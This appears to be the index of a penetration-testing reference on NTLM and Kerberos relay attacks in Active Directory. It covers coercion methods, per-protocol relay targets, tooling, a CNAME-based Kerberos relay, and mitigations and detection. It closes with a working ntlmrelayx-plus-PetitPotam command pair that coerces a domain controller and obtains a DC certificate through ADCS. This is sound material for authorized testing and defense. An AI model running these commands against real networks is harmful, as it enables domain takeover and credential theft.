A comprehensive reference for NTLM relay attacks during authorized internal penetration tests. Covers authentication fundamentals, coercion techniques, per-protocol relay targets, tooling, advanced chaining, and defensive mitigations.
- A Linux attack host (Kali, Parrot, or similar)
- Python 3.10+ with Impacket installed
- Network access to the target environment (authorized engagement)
- Basic understanding of Active Directory and Windows networking
- NTLM Authentication & Relay Theory — How NTLM works, why relaying is possible, NTLMv1 vs v2, signing, EPA
- Kerberos Authentication & Relay Theory — AS/TGS/AP exchange, SPN canonicalization, why Kerberos is still relayable
- Identifying Relay Opportunities — Enumeration, finding hosts without signing, mapping attack surface
- Coercion Overview — Forcing machines to authenticate to your listener
- PetitPotam (MS-EFSRPC)
- PrinterBug / SpoolSample (MS-RPRN)
- DFSCoerce (MS-DFSNM)
- ShadowCoerce (MS-FSRVP)
- SMB Relay — Relay to SMB for code execution
- LDAP / LDAPS Relay — Delegate access, create machine accounts, RBCD
- MSSQL Relay — Relay to SQL Server for command execution
- HTTP / WebDAV Relay — Relay to web endpoints, WebDAV coercion
- ADCS Attacks (ESC1–ESC15) — All ADCS escalation techniques including relay
- SMTP / IMAP Relay — Relay to Exchange/mail services
- RPC / DCOM Relay — Relay to RPC endpoints
- SOCKS Proxy Relay — Maintain persistent relay sessions via SOCKS
- Responder — Poisoning and capturing hashes
- ntlmrelayx.py — The primary relay framework
- mitm6 — IPv6 DNS takeover for coercion
- Certipy — ADCS enumeration and relay
- Coercer — Automated coercion tool
- krbrelayx — Kerberos relay and delegation abuse
- Cross-Protocol Relay — Relay from one protocol to another
- IPv6 Attack Chains — mitm6 + relay combos
- Relay Chaining & Pivoting — Multi-hop relay scenarios
- WebDAV Coercion Trick — Forcing HTTP auth from machines
- Kerberos Relay via DNS CNAME Abuse — Cymulate / CVE-2026-20929, Kerberos TGS relay via CNAME poisoning
- Mitigations — SMB signing, LDAP signing, EPA, disabling NTLM
- Detection — Log sources, Sigma rules, behavioral indicators
Applies to classic NTLM relay on modern (post-CVE-2019-1040) patched environments. For the more detailed cross-protocol breakdown, see Cross-Protocol Relay.
| Source Auth | → SMB | → LDAP | → MSSQL | → HTTP | → ADCS | → SOCKS |
|---|---|---|---|---|---|---|
| SMB | ✅* | ❌† | ✅ | ✅ | ❌† | ✅ |
| HTTP | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| WebDAV | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| MSSQL | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
* Target must not require SMB signing † SMB-sourced NTLM includes signing flags in NEGOTIATE, which LDAP and ADCS HTTP enforce — causing the relayed session to require a signing key the attacker does not have. This is why WebDAV/HTTP-sourced auth is preferred for LDAP and ADCS relay.
The Cymulate / CVE-2026-20929 primitive (Jan 2026) — attacker poisons DNS with a CNAME, Windows canonicalizes the SPN, client requests a TGS for the attacker's chosen target, AP-REQ is relayed. Because many services accept tickets based only on the DNS portion of the SPN, the source SPN class matters far less than in NTLM relay — what gates the attack is whether the target service enforces its own anti-relay control.
| Target service | Relayable unless... | Patch / status |
|---|---|---|
| SMB | SMB signing is required on the target | — |
| LDAP | LDAP signing is required | — |
| LDAPS | LdapEnforceChannelBinding = 2 (Always) |
— |
| HTTP / IIS | HTTP CBT enforced (HTTP.sys token checking = Require) |
CVE-2026-20929 backports HTTP.sys CBT |
ADCS /certsrv/ |
Extended Protection = Require on the vdir | HTTP.sys CBT via CVE-2026-20929 applies |
| MSSQL | Extended Protection enabled | — |
| Exchange (OWA/ECP/…) | EPA on all virtual directories | — |
All rows assume attacker has network position to poison DNS (DHCPv6 via mitm6, ARP, rogue DHCPv4). Full technique: Kerberos Relay via DNS CNAME Abuse.
- Enumerate — Find hosts with signing disabled and identify coercion targets
- Position — Start your relay listener (ntlmrelayx) pointing at your target
- Coerce — Trigger authentication from a source machine to your listener
- Profit — Relay captures and forwards the auth to your target protocol
# Classic example: coerce DC, relay to ADCS for a DC certificate
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP